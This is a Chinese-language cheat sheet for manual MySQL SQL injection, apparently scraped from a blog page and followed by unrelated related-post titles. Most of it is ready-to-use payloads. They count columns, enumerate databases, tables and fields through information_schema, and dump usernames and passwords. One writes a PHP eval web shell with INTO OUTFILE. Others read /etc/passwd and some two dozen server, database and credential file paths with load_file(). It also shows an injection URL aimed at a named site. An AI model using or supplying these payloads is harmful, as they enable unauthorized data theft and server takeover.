注入利用解析:
  暴字段长度:order by num/*
  匹配字段:and 1=1 union select 1,2,3,4,5…….n/*
  暴字段位置:and 1=2 union select 1,2,3,4,5…..n/*
  利用内置函数暴数据库信息:version()、database()、user() 
   不用猜解可用字段暴数据库信息(某些网站可能不适用):and 1=2 union all select version() /*,and 1=2 union all select database() /*,and 1=2 union all select user() /*
  操作系统信息:and 1=2 union all select @@global.version_compile_os from mysql.user /*
  数据库权限:and ord(mid(user(),1,1))=114 /* 返回正常说明为root暴库 (mysql>5.0),Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
   猜表:and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
  猜字段:and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
  暴密码:and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
  高级用法(一个可用字段显示两个数据内容):Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
  直接写马(Root权限),操作条件:
  1、知道站点物理路径
  2、有足够大的权限(可以用select …. from mysql.user测试)
   3、magic_quotes_gpc()=OFFselect ‘<?php eval($_POST[cmd])?>’ into outfile ‘物理路径’and 1=2 union all select 一句话HEX值 into outfile '路径'
  load_file() 常用路径:
  1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
  2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
  上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
  3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
  4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
  5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
  6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
  7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
  8、d:\APACHE\Apache2\conf\httpd.conf
  9、C:\Program Files\mysql\my.ini
  10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
  11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
  12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
  13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
  15、 /etc/sysconfig/iptables 本看防火墙策略
  16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
  17 、/etc/my.cnf MYSQL的配置文件
  18、 /etc/redhat-release 红帽子的系统版本
  19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
  20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
  21、/usr/local/app/php5 b/php.ini //PHP相关设置
  22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
  23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
  24、c:\windows\my.ini
  25、c:\boot.ini
  网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
  说明:Char(60)表示Char(32)表示空格
  手工注射时出现的问题:
  当注射后页面显示:Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
   如:http://huweishen.com /instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x4337747.netC626F6F742E696E69),3,4,user()%20, 这是由于前后编码不一致造成的。
  解 决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:http://huweishen.com /instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x4337747.netC626F6F742E696E69))),3,4,unhex(hex(user()))%20

PHP+MySQL手工注入问题及修复相关推荐

  1. mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析

    前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...

  2. mysql报错注入实战_手工注入——MySQL手工注入实战和分析

    今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...

  3. SQL注入第二章节MYSQL手工注入

    SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...

  4. 记一次MySQL手工注入

    本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎) 小 ...

  5. mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)

    在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...

  6. PHP+MySQL手工注入

    1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...

  7. mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程

    0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...

  8. MYSQL手工注入某日本网站

    经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了.找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一.去了解注入,还是有必要的 ...

  9. mysql手工注入imformation_SQL 注入总结

    0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术. 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 G ...

最新文章

  1. 案例:来自Uber的Go语言GC优化实践
  2. 关于Python函数的一些问题
  3. 程序员:你真的该养生了
  4. dbgrideh标题排序
  5. 6年前的Dubbo,2年前的Spring Cloud,都被这个架构干掉了
  6. js里用append()和appendChild有什么区别?
  7. 反射的应用之动态代理,顺便复习静态代理
  8. 二次规划与非线性规划及matlab应用
  9. 哪里可以做TEM/HRTEM/EDS/线扫/Mapping测试、EBSD测试
  10. 视频教程-2020年软考网络工程师基础知识历年真题详解软考视频教程-软考
  11. qt 取消按钮点击效果_Qt 对话框里添加确定取消按钮
  12. 2021.09青少年软件编程(Python)等级考试试卷(五级)
  13. java 如何读取解析 mac 下的 pages 文稿,实现数据库正向工程
  14. 解决对话框的圆角背景图片黑色部分
  15. python画图颜色设置_python画图--输出指定像素点的颜色值方法
  16. 微星z370安装linux系统,在MSI z370主板上安装win7和BIOS设置的详细教程
  17. 周期函数的傅里叶级数展开
  18. AXP221电源管理芯片使用注意点
  19. C语言通过QR分解计算矩阵的特征值和特征向量
  20. 算法工程师的正常研发流程

热门文章

  1. 从“兔子狮子谁做老板”的故事,看企业管理
  2. e2e测试框架之Cypress
  3. 背水一战 Windows 10 (40) - 控件(导航类): AppBar, CommandBar
  4. jQuery选择器之动态列表显示Demo
  5. php 如何利用 soap调用.Net的WebService asmx文件
  6. 好的 blog 整理
  7. 忘记Windows 7 登录密码,3分钟我来搞定
  8. s:select 使用
  9. 使用metasploit收集邮箱
  10. Niagara 泵阀